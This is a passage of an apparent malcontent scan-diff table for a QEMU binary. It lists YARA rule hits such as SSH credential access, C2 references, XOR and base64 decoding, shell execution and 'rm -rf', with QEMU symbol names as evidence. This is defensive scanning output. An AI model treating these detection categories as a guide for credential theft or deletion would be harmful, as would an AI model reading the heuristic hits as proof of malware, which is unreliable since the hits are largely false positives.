[discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | -| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [QEMU_IS_ALIGNED](https://github.com/search?q=QEMU_IS_ALIGNED&type=code) | -| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
[op_plugin](https://github.com/search?q=op_plugin&type=code)
[output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | -| LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code)
[/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | -| LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchownat) | May change file ownership | [fchownat](https://github.com/search?q=fchownat&type=code) | -| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | -| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | -| LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | -| LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | -| LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#gethostbyname) | [resolve network host name to IP address](https://linux.die.net/man/3/gethostbyname) | [gethostbyname](https://github.com/search?q=gethostbyname&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug)
[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) | -| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | -| LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) | -| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | -| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | +| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) | +| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | +| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | +| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | +| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) | +| MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | +| MEDIUM | [exec/tty/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/open.yara#openpty) | finds and opens an available pseudoterminal | [openpty](https://github.com/search?q=openpty&type=code) | +| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | +| MEDIUM | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_recursive_force) | Forcibly deletes files recursively | [rm -rf](https://github.com/search?q=rm+-rf&type=code) | +| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch event kind](https://github.com/search?q=touch+event+kind&type=code)
[touch event type](https://github.com/search?q=touch+event+type&type=code)
